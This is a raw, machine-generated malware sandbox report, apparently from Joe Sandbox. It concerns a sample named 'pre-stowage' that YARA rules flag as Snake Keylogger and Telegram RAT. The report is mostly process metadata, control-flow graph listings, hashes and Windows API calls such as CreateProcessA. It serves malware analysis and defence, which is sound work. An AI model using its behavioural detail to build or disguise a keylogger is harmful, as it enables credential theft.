                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:5
                                                                                                      Start time:02:33:46
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:02:33:49
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      Imagebase:0x7ff7fb730000
                                                                                                      File size:496'640 bytes
                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true


                                                                                                        Execution Graph

                                                                                                        Execution Coverage:11.5%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:134
                                                                                                        Total number of Limit Nodes:9

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ry$ry$ry
                                                                                                        • API String ID: 0-128149707
                                                                                                        • Opcode ID: ff04d71e7eb830db755381f20bae632490b43f5a6a3f81e54087bf23e7eb6149
                                                                                                        • Instruction ID: 2180b9803c0697c3129372831d511b5b4aa32f1ead897b677991b34b50e953c6
                                                                                                        • Opcode Fuzzy Hash: ff04d71e7eb830db755381f20bae632490b43f5a6a3f81e54087bf23e7eb6149
                                                                                                        • Instruction Fuzzy Hash: D1E1AFB5E1422ACFCB05CF95D8818AEFBB6FF89315F10896AC415AB344C7349A42CF94

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ry$ry$ry
                                                                                                        • API String ID: 0-128149707
                                                                                                        • Opcode ID: 145de9b4c059e3e6fc81503b3578f204b5aefdc6078b609bfae51f5e13f9c7a7
                                                                                                        • Instruction ID: 655c0c5ba5df009c3ff66c07bbc8c22d9699400ac708afe3a1703aa9c32e91c6
                                                                                                        • Opcode Fuzzy Hash: 145de9b4c059e3e6fc81503b3578f204b5aefdc6078b609bfae51f5e13f9c7a7
                                                                                                        • Instruction Fuzzy Hash: A9C17BB4D1421ADFCB04CFA9D4858AEFBB6FF89310F208959D915AB354C734AA42CF94

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Teq$Teq$z^I
                                                                                                        • API String ID: 0-127928066
                                                                                                        • Opcode ID: bba5729cb05d631b307e0b3baac0e3910ca90b3ded75e5a7e16fe75f1cdcb552
                                                                                                        • Instruction ID: 8769eda344e7a63b70cc317790c4cc1076167da3b7ef397205e296c37ee3097a
                                                                                                        • Opcode Fuzzy Hash: bba5729cb05d631b307e0b3baac0e3910ca90b3ded75e5a7e16fe75f1cdcb552
                                                                                                        • Instruction Fuzzy Hash: CAB17CB5E052198FCB04CFA9D880AEDFBB2EF89311F14816AD415BB354DB349906CFA4

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Teq$Teq$z^I
                                                                                                        • API String ID: 0-127928066
                                                                                                        • Opcode ID: 91b658027beacd4fe6cbec17e2533fd4bf73a3895352257c769f1966629190f0
                                                                                                        • Instruction ID: 9b2e0d545fb356bf946528c77095617a84d5ff7e0a299116792260b859045a11
                                                                                                        • Opcode Fuzzy Hash: 91b658027beacd4fe6cbec17e2533fd4bf73a3895352257c769f1966629190f0
                                                                                                        • Instruction Fuzzy Hash: C4A135B5E112198FCB04CFA9D880AEDFBB2FF89310F24952AD415BB254DB359906CF94

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 582 79565c0-79565e3 583 79565e5 582->583 584 79565ea-7956644 582->584 583->584 587 7956647 584->587 588 795664e-795666a 587->588 589 7956673-7956674 588->589 590 795666c 588->590 598 7956820-7956890 589->598 590->587 590->589 591 79566b7-79566bf call 7957271 590->591 592 7956776-795678b 590->592 593 7956790-79567be 590->593 594 79566dc-79566e0 590->594 595 79567ff-795681b 590->595 596 7956679-79566a1 590->596 597 795673b-7956771 590->597 590->598 599 79567c3-79567de 590->599 600 79566a3-79566b5 590->600 601 79567e3-79567fa 590->601 602 795670c-7956736 590->602 610 79566c5-79566d7 591->610 592->588 593->588 603 79566f3-79566fa 594->603 604 79566e2-79566f1 594->604 595->588 596->588 597->588 619 7956892 call 7958967 598->619 620 7956892 call 7958a40 598->620 621 7956892 call 795835e 598->621 622 7956892 call 7958918 598->622 623 7956892 call 7957f7b 598->623 624 7956892 call 7957caa 598->624 599->588 600->588 601->588 602->588 611 7956701-7956707 603->611 604->611 610->588 611->588 617 7956898-79568a2 619->617 620->617 621->617 622->617 623->617 624->617
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Teq$Teq$z^I
                                                                                                        • API String ID: 0-127928066
                                                                                                        • Opcode ID: 3e816621d878e4780be127de959ec69b9d231b209d2a386d4c1119e96f4f3336
                                                                                                        • Instruction ID: 22f5134e287e1a56d0c4932cd1cf6144119555682c3c12aa55041df12f1cc661
                                                                                                        • Opcode Fuzzy Hash: 3e816621d878e4780be127de959ec69b9d231b209d2a386d4c1119e96f4f3336
                                                                                                        • Instruction Fuzzy Hash: 3A91E4B5E116198FCB04CFAAC984A9DFBB2FF89300F24952AD415BB354D7749901CF54

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 648 795f418-795f43d 649 795f444-795f475 648->649 650 795f43f 648->650 651 795f476 649->651 650->649 652 795f47d-795f499 651->652 653 795f4a2-795f4a3 652->653 654 795f49b 652->654 669 795f70f-795f718 653->669 654->651 654->653 655 795f615-795f61e 654->655 656 795f6f5-795f70a 654->656 657 795f594-795f5a7 654->657 658 795f530-795f542 654->658 659 795f6d9-795f6f0 654->659 660 795f578-795f58f 654->660 661 795f5fb-795f610 654->661 662 795f504-795f52b 654->662 663 795f547-795f54a 654->663 664 795f623-795f64a 654->664 665 795f5e3-795f5f6 654->665 666 795f6c2-795f6d4 654->666 667 795f5ac-795f5b0 654->667 668 795f4ec-795f4ff 654->668 654->669 670 795f64f-795f662 654->670 671 795f68e-795f6a6 654->671 672 795f4a8-795f4ea 654->672 673 795f6ab-795f6bd 654->673 655->652 656->652 657->652 658->652 659->652 660->652 661->652 662->652 685 795f54d call 7956a3c 663->685 686 795f54d call 795f858 663->686 664->652 665->652 666->652 674 795f5c3-795f5ca 667->674 675 795f5b2-795f5c1 667->675 668->652 676 795f675-795f67c 670->676 677 795f664-795f673 670->677 671->652 672->652 673->652 678 795f5d1-795f5de 674->678 675->678 682 795f683-795f689 676->682 677->682 678->652 682->652 683 795f553-795f573 683->652 685->683 686->683
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TuA$UC;"
                                                                                                        • API String ID: 0-2071649361
                                                                                                        • Opcode ID: ce0a3cd109bf34653757390bf7a5366631fc0606d692db44708fcc6065c45572
                                                                                                        • Instruction ID: 494b0ce33abde8b6315b3792bca93e13b2903ab873161f19e90e37af021fcc47
                                                                                                        • Opcode Fuzzy Hash: ce0a3cd109bf34653757390bf7a5366631fc0606d692db44708fcc6065c45572
                                                                                                        • Instruction Fuzzy Hash: EC9119B0D25219EFCB08CFA6E58599EFBB3FF89314F10942AE815A7268D7709542CF50

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 687 795f408-795f43d 688 795f444-795f475 687->688 689 795f43f 687->689 690 795f476 688->690 689->688 691 795f47d-795f499 690->691 692 795f4a2-795f4a3 691->692 693 795f49b 691->693 708 795f70f-795f718 692->708 693->690 693->692 694 795f615-795f61e 693->694 695 795f6f5-795f70a 693->695 696 795f594-795f5a7 693->696 697 795f530-795f542 693->697 698 795f6d9-795f6f0 693->698 699 795f578-795f58f 693->699 700 795f5fb-795f610 693->700 701 795f504-795f52b 693->701 702 795f547-795f54a 693->702 703 795f623-795f64a 693->703 704 795f5e3-795f5f6 693->704 705 795f6c2-795f6d4 693->705 706 795f5ac-795f5b0 693->706 707 795f4ec-795f4ff 693->707 693->708 709 795f64f-795f662 693->709 710 795f68e-795f6a6 693->710 711 795f4a8-795f4ea 693->711 712 795f6ab-795f6bd 693->712 694->691 695->691 696->691 697->691 698->691 699->691 700->691 701->691 724 795f54d call 7956a3c 702->724 725 795f54d call 795f858 702->725 703->691 704->691 705->691 713 795f5c3-795f5ca 706->713 714 795f5b2-795f5c1 706->714 707->691 715 795f675-795f67c 709->715 716 795f664-795f673 709->716 710->691 711->691 712->691 717 795f5d1-795f5de 713->717 714->717 721 795f683-795f689 715->721 716->721 717->691 721->691 722 795f553-795f573 722->691 724->722 725->722
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TuA$UC;"
                                                                                                        • API String ID: 0-2071649361
                                                                                                        • Opcode ID: 388005778a383a799252592c58045249002c3f0df753ae2dea3cc8e837736c3e
                                                                                                        • Instruction ID: 2f99ae826a1f8be3d387df0ea9738a62dc5d6f6c9d883c560e51f7f716bcd955
                                                                                                        • Opcode Fuzzy Hash: 388005778a383a799252592c58045249002c3f0df753ae2dea3cc8e837736c3e
                                                                                                        • Instruction Fuzzy Hash: 2B912BB0D25219DFCB08CFA6E58599EFBB3EF89354F10942AE415B7268D7309942CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5=6
                                                                                                        • API String ID: 0-2897083178
                                                                                                        • Opcode ID: b260b875a817f2359d06d57afa3fc0d17d283da80f3e84631a6f646b96f71f70
                                                                                                        • Instruction ID: 37f29118a8d210019539fc3967a379365f7016eadf5f64f2340cba2c8fc15486
                                                                                                        • Opcode Fuzzy Hash: b260b875a817f2359d06d57afa3fc0d17d283da80f3e84631a6f646b96f71f70
                                                                                                        • Instruction Fuzzy Hash: 596159B4E1521A9FCB08CFA5D9858AEFBF2FF89300F00D92AD416E7214DB749A018F54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5=6
                                                                                                        • API String ID: 0-2897083178
                                                                                                        • Opcode ID: 74064e65c3f92d6c4bacdfd8b506a75d36fecf6ff1731dbbd3ffd527ada7313d
                                                                                                        • Instruction ID: b84ca9328bfd1e5047c7b543b740394ad992a1fc5ee1b7a33eacb050a4933752
                                                                                                        • Opcode Fuzzy Hash: 74064e65c3f92d6c4bacdfd8b506a75d36fecf6ff1731dbbd3ffd527ada7313d
                                                                                                        • Instruction Fuzzy Hash: 39717BB4E1521A9FCB08CFA5D9819AEFBF2FF89300F10D92AD416E7254DB749A018F50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: iUfo
                                                                                                        • API String ID: 0-3820436262
                                                                                                        • Opcode ID: 2d3f91fbcb67a8e5d92a2c5f5db0056041b990f80330c220e12877b32740f596
                                                                                                        • Instruction ID: b7496368d7b1d6bf299e3a553be6f29421555c471e75e2f03fd9251b5c7f61b8
                                                                                                        • Opcode Fuzzy Hash: 2d3f91fbcb67a8e5d92a2c5f5db0056041b990f80330c220e12877b32740f596
                                                                                                        • Instruction Fuzzy Hash: 975104B4E142299FCF14CFAAE5455EEFBB2FB89300F10842AE805BB254EB745A418F54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: iUfo
                                                                                                        • API String ID: 0-3820436262
                                                                                                        • Opcode ID: 8151f37e570b35e45c025bdec7c3af087fbc9a8329453076c6d87ef2de1a84fa
                                                                                                        • Instruction ID: a0c88052d9992880ec9f0b6daccf5599dbcfde680cdb309d89e9a46f90e9f1f8
                                                                                                        • Opcode Fuzzy Hash: 8151f37e570b35e45c025bdec7c3af087fbc9a8329453076c6d87ef2de1a84fa
                                                                                                        • Instruction Fuzzy Hash: C35104B4E112199FCF18CFA9E5456EEFBB2FF89304F10842AE805BB354EB745A018B54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -2m
                                                                                                        • API String ID: 0-2686427999
                                                                                                        • Opcode ID: 97a852c115e3db15b89e697239405ea4e5552dce139b5d153480918f25513389
                                                                                                        • Instruction ID: 6040990f50a9f27e56ebaeb48024515001cc24ad9c75256895c64d8b0794c703
                                                                                                        • Opcode Fuzzy Hash: 97a852c115e3db15b89e697239405ea4e5552dce139b5d153480918f25513389
                                                                                                        • Instruction Fuzzy Hash: 945137B4E142198FDB08CFEAD5406AEFBF2EB89310F24D46AD819B7254D7345A41CFA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2217c169736135a03135b58eda0927b6f3a9f65e898c6ef2a3ac063e2598571d
                                                                                                        • Instruction ID: 3bdb55d7e528c2bb6aa519e81a99bbfd3335260ad2dce1ebb6d053bf6edaa943
                                                                                                        • Opcode Fuzzy Hash: 2217c169736135a03135b58eda0927b6f3a9f65e898c6ef2a3ac063e2598571d
                                                                                                        • Instruction Fuzzy Hash: C4B16A70D0A249DFCB18CFA6D58069EFBB2FF8A340F24D46AD415AB265D7359A02CF14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5bc54a50912edc2fbfc91211f4316a766079f1a37b26b57ebc115f25967c98af
                                                                                                        • Instruction ID: b3f69a2aa88e11f04d0596868f45ac11e8946b59acd9b80a19f9d89629d4b690
                                                                                                        • Opcode Fuzzy Hash: 5bc54a50912edc2fbfc91211f4316a766079f1a37b26b57ebc115f25967c98af
                                                                                                        • Instruction Fuzzy Hash: CAB1F471E06209DFCB18CFA6D58069EFBB2FF99344F20D42AD419AB254DB359A06CF14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 797b83aae74cbe3eb8c58c8e4e60312be7c7b86a8b7493f711131ff9fa13b2f4
                                                                                                        • Instruction ID: 860f4bb1e2a22508cbdd0bfb71f2fb9548d0857e485e68a6a26163076207f1d4
                                                                                                        • Opcode Fuzzy Hash: 797b83aae74cbe3eb8c58c8e4e60312be7c7b86a8b7493f711131ff9fa13b2f4
                                                                                                        • Instruction Fuzzy Hash: FD91B774E01218CFDB58DFA9C894A9DBBB2BF89300F2085A9D419AB365DB319D46CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: db83c595f7a8ee21cd8dcc6cc566c8c45f78f44c60daf2401f57593ecc04f7e9
                                                                                                        • Instruction ID: 3bea0b490dcb27ae451584c255ce21858940b88db159a7611086aaaeeeba8c8c
                                                                                                        • Opcode Fuzzy Hash: db83c595f7a8ee21cd8dcc6cc566c8c45f78f44c60daf2401f57593ecc04f7e9
                                                                                                        • Instruction Fuzzy Hash: AF91B774E01218CFDB58DFA9C994A9EBBB2FF88300F2095A9D419AB365DB309D45CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c2a9b26693e0d56d820e6637a38ba200238e82824ef0626f00c07b0b0bd0993d
                                                                                                        • Instruction ID: 68dcb57b4529b3b995ba10ef9a10cfa9ef0add2d33ab3d38dd0af871b2a508b1
                                                                                                        • Opcode Fuzzy Hash: c2a9b26693e0d56d820e6637a38ba200238e82824ef0626f00c07b0b0bd0993d
                                                                                                        • Instruction Fuzzy Hash: 5B312BB1E006188BDB18CFA7D8446DEFBB7AFC9314F14C06AD809AB264DB355A45CF50

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 295 2e2d551-2e2d5ef GetCurrentProcess 299 2e2d5f1-2e2d5f7 295->299 300 2e2d5f8-2e2d62c GetCurrentThread 295->300 299->300 301 2e2d635-2e2d669 GetCurrentProcess 300->301 302 2e2d62e-2e2d634 300->302 303 2e2d672-2e2d68d call 2e2d738 301->303 304 2e2d66b-2e2d671 301->304 302->301 308 2e2d693-2e2d6c2 GetCurrentThreadId 303->308 304->303 309 2e2d6c4-2e2d6ca 308->309 310 2e2d6cb-2e2d72d 308->310 309->310
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02E2D5DE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 02E2D61B
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02E2D658
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02E2D6B1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 089a1ece4eead0821922fd099abc9cb1158ff40b77a56d2210c57c547c1b32b4
                                                                                                        • Instruction ID: 40ad1b70fcd2cc50108efb7b57da3736e7409261ad95228410fb6316b9761c66
                                                                                                        • Opcode Fuzzy Hash: 089a1ece4eead0821922fd099abc9cb1158ff40b77a56d2210c57c547c1b32b4
                                                                                                        • Instruction Fuzzy Hash: C85175B0D003498FEB14DFA9DA49BAEBBF1EF48314F208499D119A7290CB359949CF65

Control-flow Graph (graph rendering not reproduced; API calls listed below)

APIs
• GetCurrentProcess.KERNEL32 ref: 02E2D5DE
• GetCurrentThread.KERNEL32 ref: 02E2D61B
• GetCurrentProcess.KERNEL32 ref: 02E2D658
• GetCurrentThreadId.KERNEL32 ref: 02E2D6B1
Memory Dump Source
• Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: f0b0af7941ab86b638bd3cffbb24d51c9e13515ee6d08b4e1045a5ee251a84cc
• Instruction ID: 31090bcdb7862b85b795aaa4abb62ff335aa4fea7e05acf956c266ef14a1e9bc
• Opcode Fuzzy Hash: f0b0af7941ab86b638bd3cffbb24d51c9e13515ee6d08b4e1045a5ee251a84cc
• Instruction Fuzzy Hash: B05175B0D003098FEB14DFA9DA49BAEBBF1EB88314F20C499D119A7390CB749845CF65

Control-flow Graph (graph rendering not reproduced; API calls listed below)

APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 094AA566
Memory Dump Source
• Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 66f1de6ab32aa463aabb7e29759c3459623c673bacc30c4b7e1349d76492c094
• Instruction ID: 9b61cc5b1cc3cae043dee5dd675ba8e3f90e6fadb5b24f894d0abd1fb146b0ca
• Opcode Fuzzy Hash: 66f1de6ab32aa463aabb7e29759c3459623c673bacc30c4b7e1349d76492c094
• Instruction Fuzzy Hash: D0A14C71D003198FEB24CF68CC45BEEBBB2BF58310F14856AE849A7250DB759985CFA1

Control-flow Graph (graph rendering not reproduced; API calls listed below)

APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 094AA566
Memory Dump Source
• Source File: 00000000.00000002.1331270864.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_94a0000_pre-stowage.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: b89519720e396245ad669b986a9bc68d3afa65b390dd8bb6042fe5ad31671773
• Instruction ID: 028985cc5c2d8870cbed911b817478c9f12e337f73b0cea314b6451595e32a07
• Opcode Fuzzy Hash: b89519720e396245ad669b986a9bc68d3afa65b390dd8bb6042fe5ad31671773
• Instruction Fuzzy Hash: D5915C71D003198FEB24CF68CC45BEEBBB2BF58310F14856AE849A7250DB759985CFA1

Control-flow Graph (graph rendering not reproduced; API calls listed below)

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 02E2B546
Memory Dump Source
• Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 081bcaaecad93294155b825365d5bafd8ceadf4bd83f0e3baeffbd532c6528bc
• Instruction ID: c5ac693a43c841ae3e992ec0d10ecff96ada13b0e613feb26a41cf28c9d0fe4c
• Opcode Fuzzy Hash: 081bcaaecad93294155b825365d5bafd8ceadf4bd83f0e3baeffbd532c6528bc
• Instruction Fuzzy Hash: 48815670A00B558FD724CF29D5917AABBF2FF88308F00992DD48ADBA50D775E849CB90

Control-flow Graph (graph rendering not reproduced; API calls listed below)

APIs
• CreateActCtxA.KERNEL32(?), ref: 02E259C9
Memory Dump Source
• Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: ced9aeeb75ac490bce9eb7cea0177e97680953ef40e91c093800135c5b8cf54d
• Instruction ID: 88493bde66010c94b6817abca3ced9bb43623546e2f257966e5b9637cb3cf530
• Opcode Fuzzy Hash: ced9aeeb75ac490bce9eb7cea0177e97680953ef40e91c093800135c5b8cf54d
• Instruction Fuzzy Hash: 594103B0C00729CBEB24CFA9C9857DDBBF1BF48304F60816AD409AB251DB75594ACF90
APIs
• CreateActCtxA.KERNEL32(?), ref: 02E259C9
Memory Dump Source
• Source File: 00000000.00000002.1319047353.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e20000_pre-stowage.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 592a46960ecd428c8e4c74a0fb035fb2b267045a981cc0545765e7d8124e387e
• Instruction ID: 3014e9f3bbecd6ed34441f062f885105301b3af214deaa68bdcacefe7fd6d361
• Opcode Fuzzy Hash: 592a46960ecd428c8e4c74a0fb035fb2b267045a981cc0545765e7d8124e387e
• Instruction Fuzzy Hash: AE4103B0C0072DCBEB24CFA9C9457DEBBB5BF48314F60806AD509AB250DB75594ACF90
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 079500D7
Memory Dump Source
• Source File: 00000000.00000002.1328779583.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7950000_pre-stowage.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 06bf2a1fef69a8b651c53ec9f31b31159969223e919e837402bda549bc8a24cc
